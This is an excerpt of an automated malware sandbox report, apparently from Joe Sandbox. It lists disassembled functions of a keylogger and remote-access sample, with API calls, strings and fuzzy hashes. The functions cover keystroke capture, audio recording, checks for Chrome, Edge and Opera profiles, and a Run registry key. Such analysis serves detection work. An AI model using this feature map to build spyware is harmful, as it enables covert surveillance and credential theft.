                                                                                        • API String ID: 1931167962-604454484
                                                                                        • Opcode ID: 67dfb507ba3ddc82345b7865ce065edb943c59958e882518e560ee8acae80623
                                                                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                                        • Opcode Fuzzy Hash: 67dfb507ba3ddc82345b7865ce065edb943c59958e882518e560ee8acae80623
                                                                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: alarm.wav$hYG
                                                                                        • API String ID: 1174141254-2782910960
                                                                                        • Opcode ID: 03e35b0c78ecaf780253322939ef9894f1bf68fcbaf7cdf3e29ba7f04c14b924
                                                                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                                        • Opcode Fuzzy Hash: 03e35b0c78ecaf780253322939ef9894f1bf68fcbaf7cdf3e29ba7f04c14b924
                                                                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                        • String ID: Online Keylogger Stopped
                                                                                        • API String ID: 1623830855-1496645233
                                                                                        • Opcode ID: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                                                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                                        • Opcode Fuzzy Hash: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                                                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID: LCMapStringEx$PkGNG
                                                                                        • API String ID: 2568140703-1065776982
                                                                                        • Opcode ID: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
                                                                                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                                                        • Opcode Fuzzy Hash: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
                                                                                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • waveInPrepareHeader.WINMM(3BDDCCB0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                        • waveInAddBuffer.WINMM(3BDDCCB0,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                        • String ID: XMG
                                                                                        • API String ID: 2315374483-813777761
                                                                                        • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                        • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocaleValid
                                                                                        • String ID: IsValidLocaleName$JD
                                                                                        • API String ID: 1901932003-2234456777
                                                                                        • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                                        • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                        • API String ID: 1174141254-4188645398
                                                                                        • Opcode ID: 17c9011fa542958c15b72ddc3a7e9f127f6f7589f16583e289a5dca73bf18d7d
                                                                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                                        • Opcode Fuzzy Hash: 17c9011fa542958c15b72ddc3a7e9f127f6f7589f16583e289a5dca73bf18d7d
                                                                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                        • API String ID: 1174141254-2800177040
                                                                                        • Opcode ID: 301bca9181d55b465d3b8d6a7efc18935aa9a07cf1e99a5e84e545466515311e
                                                                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                                        • Opcode Fuzzy Hash: 301bca9181d55b465d3b8d6a7efc18935aa9a07cf1e99a5e84e545466515311e
                                                                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                                        • API String ID: 1174141254-1629609700
                                                                                        • Opcode ID: b8c516bb158aa04a74b03855c1146b8495a40d5fbf5c647b7b4dc51e59d10cd3
                                                                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                                        • Opcode Fuzzy Hash: b8c516bb158aa04a74b03855c1146b8495a40d5fbf5c647b7b4dc51e59d10cd3
                                                                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                        • String ID: [AltL]$[AltR]
                                                                                        • API String ID: 2738857842-2658077756
                                                                                        • Opcode ID: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                                                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                                        • Opcode Fuzzy Hash: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                                                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: uD
                                                                                        • API String ID: 0-2547262877
                                                                                        • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                                                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                                        • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                                                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem
                                                                                        • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                                                        • API String ID: 2086374402-949981407
                                                                                        • Opcode ID: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
                                                                                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                                                        • Opcode Fuzzy Hash: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
                                                                                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShell
                                                                                        • String ID: !D@$open
                                                                                        • API String ID: 587946157-1586967515
                                                                                        • Opcode ID: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                                                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                                        • Opcode Fuzzy Hash: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                                                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___initconout.LIBCMT ref: 0045555B
                                                                                          • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                                                                        • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ConsoleCreateFileWrite___initconout
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 3087715906-263838557
                                                                                        • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                        • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                                                                        • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                        • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: State
                                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                                        • API String ID: 1649606143-2446555240
                                                                                        • Opcode ID: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                                                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                                        • Opcode Fuzzy Hash: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                                                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer__onexit
                                                                                        • String ID: ,kG$0kG
                                                                                        • API String ID: 1881088180-2015055088
                                                                                        • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                                                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                                        • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                                                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteOpenValue
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                        • API String ID: 2654517830-1051519024
                                                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                                        • GetLastError.KERNEL32 ref: 00440D35
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1717984340-0
                                                                                        • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                                                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                                        • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                                                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                                        • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                                                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
